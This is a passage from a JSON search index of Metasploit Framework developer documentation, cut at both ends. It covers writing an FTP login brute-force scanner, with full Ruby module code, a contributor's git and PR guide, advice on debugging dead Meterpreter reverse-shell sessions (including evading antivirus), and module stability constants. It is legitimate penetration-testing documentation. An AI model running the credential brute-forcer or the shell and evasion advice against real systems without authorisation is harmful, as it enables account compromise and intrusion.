errors or too many in a row | it runs through all of the credentials by calling each_credential with a block | in that block it passes each credential to #attempt_login | it yields the Result object into the block it is passed | if stop_on_success is set it will also exit out early if it the result was a success | . # Attempt to login with every {Credential credential} in # {#cred_details}, by calling {#attempt_login} once for each. # # If a successful login is found for a user, no more attempts # will be made for that user. # # @yieldparam result [Result] The {Result} object for each attempt # @yieldreturn [void] # @return [void] def scan! valid! # Keep track of connection errors. # If we encounter too many, we will stop. consecutive_error_count = 0 total_error_count = 0 successful_users = Set.new each_credential do |credential| next if successful_users.include?(credential.public) result = attempt_login(credential) result.freeze yield result if block_given? if result.success? consecutive_error_count = 0 break if stop_on_success successful_users &amp;lt;&amp;lt; credential.public else if result.status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT consecutive_error_count += 1 total_error_count += 1 break if consecutive_error_count &amp;gt;= 3 break if total_error_count &amp;gt;= 10 end end end nil end . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#methods",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#methods"
  },"71": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Constants",
    "content": "Although not defined on Base, each LoginScanner has a series of Constants that can be defined on it to assist with critical behaviour. | DEFAULT_PORT: DEFAULT_PORT is a simple constant for use with set_sane_defaults. If the port isn’t set by the user it will use DEFAULT_PORT. This is put in a constant so it can be quickly referenced from outside the scanner. | . These next two Constants are used by the LoginScanner namespace method classes_for_services. This method invoked by Metasploit::Framework::LoginScanner.classes_for_service(&amp;lt;Mdm::service&amp;gt;) will actually return an array of LoginScanner classes that may be useful to try against that particular Service. | LIKELY_PORTS : This constant holds n array of port numbers that it would be likely useful to use this scanner against. | LIKELY_SERVICE_NAMES : Like above except with strings for service names instead of port numbers. | PRIVATE_TYPES : This contains an array of symbols representing the different Private credential types it supports. It should always match the demodulize result for the Private class i.e :password, :ntlm_hash, :ssh_key | . These constants are fore LoginScanners that have to deal with Realms such as AD domains or Database Names. | REALM_KEY: The type of Realm this scanner expects to deal with. Should always be a constants from Metasploit::Model::Login::Status | DEFAULT_REALM: Some scanners have a default realm (like WORKSTATION for AD domain stuff). If a credential is given to a scanner that requires a realm, but the credential has no realm, this value will be added to the credential as the realm. | CAN_GET_SESSION: this should be either true or false as to whether we expect we could somehow get a session with a Credential found from this scanner. | . example1 ( Metasploit::Framework::LoginScanner::FTP) . DEFAULT_PORT = 21 LIKELY_PORTS = [ DEFAULT_PORT, 2121 ] LIKELY_SERVICE_NAMES = [ 'ftp' ] PRIVATE_TYPES = [ :password ] REALM_KEY = nil . example2 ( Metasploit::Framework::LoginScanner::SMB) . CAN_GET_SESSION = true DEFAULT_REALM = 'WORKSTATION' LIKELY_PORTS = [ 139, 445 ] LIKELY_SERVICE_NAMES = [ \"smb\" ] PRIVATE_TYPES = [ :password, :ntlm_hash ] REALM_KEY = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#constants",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#constants"
  },"72": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Pulling it all Together in a module",
    "content": "So now you hopefully have a good idea of all the moving pieces involved in creating a LoginScanner. The next step is using your brand new LoginScanner in an actual module. Let’s look at the ftp_login module: . def run_host(ip) . Every Bruteforce/Login module should be a scanner and should use the run_host method which will run once for each RHOST. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#pulling-it-all-together-in-a-module",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#pulling-it-all-together-in-a-module"
  },"73": {
    "doc": "Writing an FTP LoginScanner",
    "title": "The Cred Collection",
    "content": "cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], prepended_creds: anonymous_creds ) . So here we see the CredentialCollection getting created using the datastore options. We pass in the options for Cred creation such as wordlists, raw usernames and passwords, whether to try the username as a password, and whether to try blank passwords. you’ll also notice an option here called prepended_creds. FTP is one of the only module to make use of this, but it is generally available through the CredentialCollection. This option is an array of Metasploit::Framework::Credential objects that should be spit back by the collection before any others. FTP uses this to deal with testing for anon FTP access. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-cred-collection",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-cred-collection"
  },"74": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Initialising the Scanner",
    "content": "scanner = Metasploit::Framework::LoginScanner::FTP.new( host: ip, port: rport, proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], connection_timeout: 30 ) . Here we actually create our Scanner object. We set the IP and Port based on data the module already knows about. We can pull any user supplied proxy data from the datatstore. we also pull from the datastore whether to stop on a success for this service. The cred details object is populated by our Credentialcollection which will handle all the credential generation for us invisibly. This gives us our scanner object, all configured and ready to go. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#initialising-the-scanner",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#initialising-the-scanner"
  },"75": {
    "doc": "Writing an FTP LoginScanner",
    "title": "The Scan Block",
    "content": "scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) if result.success? credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) print_good \"#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}\" else invalidate_login(credential_data) print_status \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\" end end . This is the real heart of the matter here. We call scan! on our scanner, and pass it a block. As we mentioned before, the scanner yields each attempt’s Result object into that block. We check the result’s status to see if it was successful or not. The result object now as a .to_h method which returns a hash compatible with our credential creation methods. We take that hash and merge in our module specific information and workspace id. In the case of a success we build some info hashes and call create_credential. This is a method found in the metasploit-credential gem under lib/metasploit/credential/creation.rb in a mixin called Metasploit::Credential::Creation. This mixin is included in the Report mixin, so if your module includes that mixin you’ll get these methods for free. create_credential creates a Metasploit::Credential::Core. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the Metasploit::Credential::Login), the status. Finally, for a success, we output the result to the console. In the case of a failure, we call the invalidate_login method. This method also comes from the Creation mixin. This method looks to see if a Login object already exists for this credential:service pair. If it does, it updates the status to the status we got back from the scanner. This is primarily to account for Login objects created by things like Post modules that have an untried status. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-scan-block",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-scan-block"
  },"76": {
    "doc": "Writing an FTP LoginScanner",
    "title": "ftp_login Final View",
    "content": "Pulling it all together, we get a new ftp_login module that looks something like this: . ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' class Metasploit3 &amp;lt; Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute def proto 'ftp' end def initialize super( 'Name' =&amp;gt; 'FTP Authentication Scanner', 'Description' =&amp;gt; %q{ This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. }, 'Author' =&amp;gt; 'todb', 'References' =&amp;gt; [ [ 'CVE', '1999-0502'] # Weak password ], 'License' =&amp;gt; MSF_LICENSE ) register_options( [ Opt::RPORT(21), OptBool.new('RECORD_GUEST', [ false, \"Record anonymous/guest logins to the database\", false]) ], self.class) register_advanced_options( [ OptBool.new('SINGLE_SESSION', [ false, 'Disconnect after every login attempt', false]) ] ) deregister_options('FTPUSER','FTPPASS') # Can use these, but should use 'username' and 'password' @accepts_all_logins = {} end def run_host(ip) print_status(\"#{ip}:#{rport} - Starting FTP login sweep\") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], prepended_creds: anonymous_creds ) scanner = Metasploit::Framework::LoginScanner::FTP.new( host: ip, port: rport, proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], connection_timeout: 30 ) scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) if result.success? credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) print_good \"#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}\" else invalidate_login(credential_data) print_status \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\" end end end # Always check for anonymous access by pretending to be a browser. def anonymous_creds anon_creds = [ ] if datastore['RECORD_GUEST'] ['IEUser@', 'User@', '[email protected]', '[email protected]' ].each do |password| anon_creds &amp;lt;&amp;lt; Metasploit::Framework::Credential.new(public: 'anonymous', private: password) end end anon_creds end def test_ftp_access(user,scanner) dir = Rex::Text.rand_text_alpha(8) write_check = scanner.send_cmd(['MKD', dir], true) if write_check and write_check =~ /^2/ scanner.send_cmd(['RMD',dir], true) print_status(\"#{rhost}:#{rport} - User '#{user}' has READ/WRITE access\") return 'Read/Write' else print_status(\"#{rhost}:#{rport} - User '#{user}' has READ access\") return 'Read-only' end end end . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#ftp_login-final-view",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#ftp_login-final-view"
  },"77": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Writing an FTP LoginScanner",
    "content": "So, you want to make a Login Scanner Module in Metasploit, eh? There are a few things you will need to know before you begin. This article will try to illustrate all the moving pieces involved in creating an effective bruteforce/login scanner module. | Credential objects | Result objects | CredentialCollection | LoginScanner Base . | Attributes | Methods | Constants | . | Pulling it all Together in a module . | The Cred Collection | Initialising the Scanner | The scan block | ftp_login final view | . | . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html"
  },"78": {
    "doc": "Creating Your First PR",
    "title": "Creating Your First PR - An Intro To Git and the PR Process",
    "content": " ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#creating-your-first-pr---an-intro-to-git-and-the-pr-process",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#creating-your-first-pr---an-intro-to-git-and-the-pr-process"
  },"79": {
    "doc": "Creating Your First PR",
    "title": "Intro",
    "content": "Congratulations fellow traveler, so you’re interested in contributing to Metasploit eh? Well welcome aboard, its going to be a fun ride! You’ll learn lots along the way but here are some tips and tricks that should help you get started with making your first PR request whilst also avoiding some common pitfalls and learning how some of our systems work. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#intro",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#intro"
  },"80": {
    "doc": "Creating Your First PR",
    "title": "Initial Steps and Important Notes",
    "content": "The rest of this guide assumes you have already followed the steps at Setting Up A Developer Environment in order to get a fork of Metasploit set up and ready to run, and that you have added in your SSH keys (see Adding a New SSH Key To Your GitHub Account), set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#initial-steps-and-important-notes",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#initial-steps-and-important-notes"
  },"81": {
    "doc": "Creating Your First PR",
    "title": "Getting the Latest Version of Metasploit Framework",
    "content": "Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework. To do this run git checkout master &amp;amp;&amp;amp; git fetch upstream &amp;amp;&amp;amp; git pull, where upstream is the branch connected to the Rapid7 remote, aka Rapid7’s copy of the code. You can verify that upstream is set correctly by running git remote get-url upstream and verifying it is set to [email protected]:rapid7/metasploit-framework.git. Once you run this command, it will check out the master branch, then fetch all the changes from upstream (which should be configured to be Rapid7’s copy of Metasploit Framework on GitHub). Once it has cached these changes, the git pull command will then pull these changes into the current branch, aka master. Not pulling down changes before writing new code could lead to big issues down the line, particularly if someone has edited a file you intended to modify. In that case maintainers will then have to try find the right combination of changes to implement, which could lead to your PR being rejected if these changes are too complex. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#getting-the-latest-version-of-metasploit-framework",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#getting-the-latest-version-of-metasploit-framework"
  },"82": {
    "doc": "Creating Your First PR",
    "title": "Making Sure Your Gems Are Updated",
    "content": "The next step is to make sure you have the latest copy of the Gems that Metasploit Framework depends on. This can be done by running bundle install from the same directory as where the Gemfile.lock file is located, which will be in the same folder as wherever you cloned your fork to locally. Doing this will allow you to make sure that you are running the latest libraries, which will ensure if you do encounter any bugs whilst developing code, those bugs are not related to out of date Gems being installed, and are therefore potentially legitimate bugs that need fixing. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#making-sure-your-gems-are-updated",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#making-sure-your-gems-are-updated"
  },"83": {
    "doc": "Creating Your First PR",
    "title": "Creating a New Branch for Your Code",
    "content": "Once all of this is done, you will want to create a new branch for your code, which can be done by running git checkout -b &amp;lt;your branch name here&amp;gt;. This will snapshot the current branch that you are on, and use that to create a new branch with the name provided. Note that I did say snapshot. This is why it’s important to update the current branch’s code to the latest version of Metasploit Framework available prior to running this command, otherwise the new branch will contain outdated code. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#creating-a-new-branch-for-your-code",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#creating-a-new-branch-for-your-code"
  },"84": {
    "doc": "Creating Your First PR",
    "title": "Adding in Your Changes and Creating Meaningful Commit Messages",
    "content": "Once you have made your code changes, add them using git add &amp;lt;path to file to add&amp;gt; &amp;lt;optional path to second file to add&amp;gt;. Note that you can specify multiple files to add using git add at the same time. To commit these changes locally, use git commit -m \"&amp;lt;commit message here&amp;gt;\". Note that as a general rule of thumb, commit messages should aim to be 50 characters or less while telling readers what was changed in that commit. You generally don’t want to create commits that do multiple things at once, instead create a separate commit for each group of items that you are changing, and make sure that the commit message reflects what changed in a general sense. Note also that maintainers may end up squashing your commits down so that your commit A, B, and C, now become commit D which contains all of the same changes as commit A, B, and C, but in one commit and with one associated commit message. This is often done when the code is ready to be landed into Metasploit Framework to help make the commit history easier for people to read. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#adding-in-your-changes-and-creating-meaningful-commit-messages",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#adding-in-your-changes-and-creating-meaningful-commit-messages"
  },"85": {
    "doc": "Creating Your First PR",
    "title": "Checking for Code Errors",
    "content": "Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, from the root of wherever you cloned your fork of Metasploit Framework to on disk, run rubocop &amp;lt;path to your module from current directory&amp;gt;. Specifying the -a parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix. In this case the command would be rubocop -a &amp;lt;path to your module from current directory&amp;gt;. It is encouraged to keep running this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is complete, run git add &amp;lt;file&amp;gt; followed by git commit -m \"RuboCop Fixes\". You can change the commit message if you want, but it should mention RuboCop as it helps maintainers know what the commit is related to. As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes. This helps ensure that when it comes time to review your code, review can proceed a lot quicker and more efficiently. Note that special cases exist if you are writing library code as our RuboCop rules are primarily designed to be run against modules. If at any point you are confused r.e this, please feel free to reach out and ask us for help on Slack at https://metasploit.com/slack. Once this is done, the next tool to run is located in the root of the Metasploit local fork at tools/dev/msftidy.rb. You will want to run this tool against your module code (if applicable), using tools/dev/msftidy.rb &amp;lt;path to module&amp;gt;. This will give some output if there are any errors, or no output if your module passed the tests. Try and fix any errors mentioned here. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#checking-for-code-errors",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#checking-for-code-errors"
  },"86": {
    "doc": "Creating Your First PR",
    "title": "Writing Documentation",
    "content": "The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information on how to write module documentation at Writing Module Documentation. In general when writing documentation you will want to search for a similar documentation file under the documentation folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing your new documentation for your module. When writing the information for the documentation, be sure to make sure your installation steps are as clear as possible. Any confusion over how to set up the target to be exploited will likely result in delays. You will want to put as much detail here as possible. Additionally any information about caveats, scenarios you have tested, custom options you added in, or quirks you noticed should also go into this file. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#writing-documentation",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#writing-documentation"
  },"87": {
    "doc": "Creating Your First PR",
    "title": "Checking Documentation Syntax",
    "content": "Once you have written the documentation, you then want to run toos/dev/msftidy_docs.rb &amp;lt;path to documentation file&amp;gt;. This will report on any errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines, these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be safely ignored. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#checking-documentation-syntax",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#checking-documentation-syntax"
  },"88": {
    "doc": "Creating Your First PR",
    "title": "Submitting Your Changes and Opening a PR",
    "content": "Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which branch points to your copy of the code. If you have followed the setup guide, it should be origin. You can double check this branch’s remote URL using git remote get-url origin. It should look something like [email protected]:gwillcox-r7/metasploit-framework with gwillcox-r7 substituted for your username. Assuming the origin branch is in fact pointing to your copy of the code, run git push origin local-branch:remote-branch and replace local-branch with the branch locally where your code changes are located, and remote-branch with what you want this branch to be called on the remote repository, aka origin which will be your fork on GitHub.com. In most cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you start working with more complex situations. Note that if the branch pointing to your copy of the code is not named origin, replace the word origin in the command above with the name of the branch that does point to your copy of the code. This should result in output similar to the following: . &amp;gt; git push origin update_mssql_lib_parameters:update_mssql_lib_parameters Enumerating objects: 15, done. Counting objects: 100% (15/15), done. Delta compression using up to 2 threads Compressing objects: 100% (8/8), done. Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done. Total 8 (delta 7), reused 0 (delta 0), pack-reused 0 remote: Resolving deltas: 100% (7/7), completed with 7 local objects. remote: remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting: remote: https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters remote: To github.com:gwillcox-r7/metasploit-framework * [new branch] update_mssql_lib_parameters -&amp;gt; update_mssql_lib_parameters . To create a new pull request (aka PR), browse to the URL mentioned in this output. In this case for the output above this would be https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters. This will open a new template to create a PR request. Please follow all of the directions here and provide the requested details whilst also deleting the template text once you have provided the requested information. Note that PRs that do not provide anything but the template text for their description will be closed. In your PR description you should take care to mention what it is that you are submitting, details on the type of vulnerability and CVE-ID, if applicable, how to test the submission, as well as any special concerns or items of note that occurred whilst conducting testing. Once this is done a member of our team will review your PR within a few days and provide feedback on any changes that may still need to be made before the submission can be accepted. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#submitting-your-changes-and-opening-a-pr",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#submitting-your-changes-and-opening-a-pr"
  },"89": {
    "doc": "Creating Your First PR",
    "title": "Creating Your First PR",
    "content": " ",
    "url": "/docs/development/get-started/creating-your-first-pr.html",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html"
  },"90": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "On this page",
    "content": ". | On this page | Background knowledge | Stagers, stages, and handlers | LHOST and LPORT | LHOST | LPORT | Check dead shells . | Quick things to check | Not so quick things to check | . | . Dead shells. Nobody likes them. Yet, despite the advances made in the Metasploit stagers and Meterperter itself, we still see them regularly. There are many reasons why shells refuse to connect or die after they’re established. The goal of this post is to help people understand why. Hopefully, by the end, the most common causes will be understood, and users can fix things themselves. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#on-this-page",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#on-this-page"
  },"91": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Background knowledge",
    "content": "Prior to diving into the possible breakages and their causes, it’s important to have some background knowledge of stagers, and how Meterpreter works. Please be sure to read the following articles prior to reading the rest of this post: . | Meterpreter Stageless Mode - Covers the exploitation process, and how Meterpreter sessions are established. This is important because understanding how the different components interact and what allows for easier debugging later. | Meterpreter Configuration - Covers how configuration works in Meterpreter. This is important because it highlights the separation of configuration in stagers and Meterpreter. This alone is the key to many breakages, especially in HTTP/S payloads. | The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers - Covers the detail of HTTP/S based communications in the stagers and in Meterpreter itself. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#background-knowledge",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#background-knowledge"
  },"92": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Stagers, stages, and handlers",
    "content": "Each exploit and handler is made up of multiple things, and they’re all independent: . | Stager: This is the small bit of code that is first executed by the target. It contains it’s own bundled implementation of a communications channel. It has the goal of establishing communication with Metasploit, downloading the stage, and invoking it. It has it’s own configuration. | Stage: This is the second payload that is executed by the target. It is sent to the target via the communications channel that was opened by the stage. Once downloaded, it is invoked, and from there, it takes over. It has its own configuration. | Handler: This is the code that runs on the attacker’s machine. It is responsible for handling the attacker-side of the communications channel that is established by the stager. It is responsible for uploading the stage. It is responsible for handling communication between the attacker and the target once the stage has taken over from the stager. | . In some cases, there might be multiple stages (as is the case with POSIX Meterpreter). This is called an intermediate stage. Usually, these stages are slightly bigger than the stager and can do more work to help establish communications. The most important thing to remember is that both the stager and the stage have their own configurations that are independent. THE MOST COMMON cause of dead shells is the result of the stage not having the correct configuration; in other words, it’s different to that specified in the stager. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#stagers-stages-and-handlers",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#stagers-stages-and-handlers"
  },"93": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "LHOST and LPORT",
    "content": "Any user of Metasploit will tell you that they know what LHOST and LPORT mean, yet it’s incredibly common to find out that their understanding isn’t 100% correct. To prevent dead sessions that are related to a misconfiguration of these values, we need to make sure we understand what they mean. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost-and-lport",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost-and-lport"
  },"94": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "LHOST",
    "content": "LHOST is short for Local Host. This value represents the IP address or hostname that stagers and stages should attempt to connect to. It is where the handler can be reached. This doesn’t mean that this is where the handler actually exists. LHOST is a value that is meaning from the perspective of the target machine. This value is passed along as part of the configuration for stagers and stages and tells the target machine where to go to reach the handler, and so this has to map to a value that is reachable by the target. A handler obviously needs to listen on a host/IP for the incoming connection. In cases where the LHOST value, for example the address that the target is able to reach, is the same as that which the host can listen on, no extra work has to be done. The LHOST value is used by the handler. However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting LHOST isn’t enough. In order to listen on the appropriate interface, another setting must be used called ReverseListenerBindAddress. This value tells the handler to listen on a different interface/IP, but it doesn’t change the fact that the LHOST value is given to the target when the stage is uploaded. In short, LHOST must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the ReverseListenerBindAddress value. If you’re attacking something across the Internet and you specify an internal IP in LHOST, you’re doing it wrong. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost"
  },"95": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "LPORT",
    "content": "The principles of LHOST and ReverseListenerBindAddress can be applied to LPORT and ReverseListenerBindPort as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the ReverseListenerBindPort setting. The classic example of this case is where an attacker wants to make use of port 443, but rightfully doesn’t want to run Metasploit as root just so they can directly bind to ports lower than 1024. Instead, the set up a port forward (on their router, or using iptables) so that 443 forwards to 8443, with a goal of accepting connections on that port instead. To accommodate this scenario, the LHOST value must still contain 443, as this is the port that the target machine needs to establish communications on; 443 is the value that needs to go out with the stager and the stage configurations. Metasploit needs to bind locally to port 8443, and so the handler is configured so that ReverseListenerBindPort has this value instead. When the handler launches, it binds to 8443 and handles any connections it receives. When a stage is generated, it uses 443 from LHOST value to populate the configuration. If the attacker makes the mistake of either setting LPORT to 8443, or leaving LPORT as 443 and not using ReverseListenerBindPort, then the result is either a dead shell after the first stage, or no connect back at all. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lport",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lport"
  },"96": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Check dead shells",
    "content": "There are a few things to check for when debugging a dead shell. Quick things to check . | Make sure that LHOST is set to a routable address from the target, and not a local listen address. | Make sure that LPORT is set to the port number that the target needs to connect to. | Make sure that ReverseListenerBindPort is set if port forwarding is enabled and the traffic is being routed to a different port. | Make sure that your listener’s configuration matches that of the target from an architecture perspective. If you mix x64 listeners with x86 payloads (and vice versa), things will go bad. | . Not so quick things to check . | If the target is running AntiVirus there’s a chance that the stage , for example metsrv, is being caught while being uploaded. reverse_tcp and reverse_http stagers download metsrv without any encryption, and so the content of the DLL is visible to anything watching on the wire. reverse_https can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#check-dead-shells",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#check-dead-shells"
  },"97": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Debugging Dead Meterpreter Sessions",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html"
  },"98": {
    "doc": "Definition of Module Reliability Side Effects and Stability",
    "title": "Allowed Values",
    "content": "Stability . | Constant | Description | . | CRASH_SAFE | Module should not crash the service or OS | . | CRASH_SERVICE_RESTARTS | Module may crash the service, but it will restart | . | CRASH_SERVICE_DOWN | Module may crash the service, and remain down | . | CRASH_OS_RESTARTS | Module may crash the OS, but it will restart | . | CRASH_OS_DOWN | Module may crash the OS, and remain down | . | SERVICE_RESOURCE_LOSS | Module causes a resource to be unavailable for the service | . | OS_RESOURCE_LOSS | Module causes a resource to be unavailable for the OS | . Side Effects . | Constant | Description | . | ARTIFACTS_ON_DISK | Module leaves a payload, a dropper, etc, on the target machine | . | CONFIG_CHANGES | Module modifies some config file | . | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) | . | ACCOUNT_LOCKOUTS | Module may cause an account to lock out | . | SCREEN_EFFECTS | Module shows something on the screen that a human may notice | . | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) | . | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) | . Reliability . | Constant | Description | . | FIRST_ATTEMPT_FAIL | The module may fail for the first attempt | . | REPEATABLE_SESSION | The module is expected to get a session every time it runs | . | UNRELIABLE_SESSION | The module isn’t expected to get a shell reliably (such as only once) | . | EVENT_DEPENDENT | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc | . ",
    "url": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html#allowed-values",
    "relUrl": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html#allowed-values"
  },"99": {
    "doc": "Definition of Module Reliability Side Effects and Stability",
    "title": "Definition of Module Reliability Side Effects and Stability",
